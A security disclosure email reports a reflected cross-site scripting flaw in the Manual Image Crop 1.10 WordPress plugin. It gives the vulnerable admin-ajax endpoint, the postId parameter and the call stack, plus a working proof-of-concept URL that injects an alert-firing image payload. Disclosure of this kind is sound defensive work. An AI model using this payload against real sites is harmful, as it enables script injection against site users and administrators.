Subject: Cross-Site Scripting (XSS) in Manual Image Crop 1.10
Date: Mon, 24 Aug 2015 13:54:27 +0200

Hello,

Plugin: Manual Image Crop 1.10 https://wordpress.org/plugins/manual-image-crop/

1. Reflected Cross-Site Scripting (XSS)

Authenticated users (like subscribers) can inject html/js code (there is no CSRF protection).

Method: GET
Url: http://localhost/wp-admin/admin-ajax.php?action=mic_editor_window&postId=[xss]
Vulnerable parameters: postId

Example PHP callstack:
mic_ajax_editor_window   [/manual-image-crop/manual-image-crop.php:50]
ManualImageCropEditorWindow::renderWindow   [/manual-image-crop/lib/ManualImageCropEditorWindow.php:77]

Verification:
http://localhost/wp-admin/admin-ajax.php?action=mic_editor_window&postId=%22%3E%3Cimg%20src=x%20onerror=alert(1)%20/%3E

-- 
Regards,
Marcin Probola,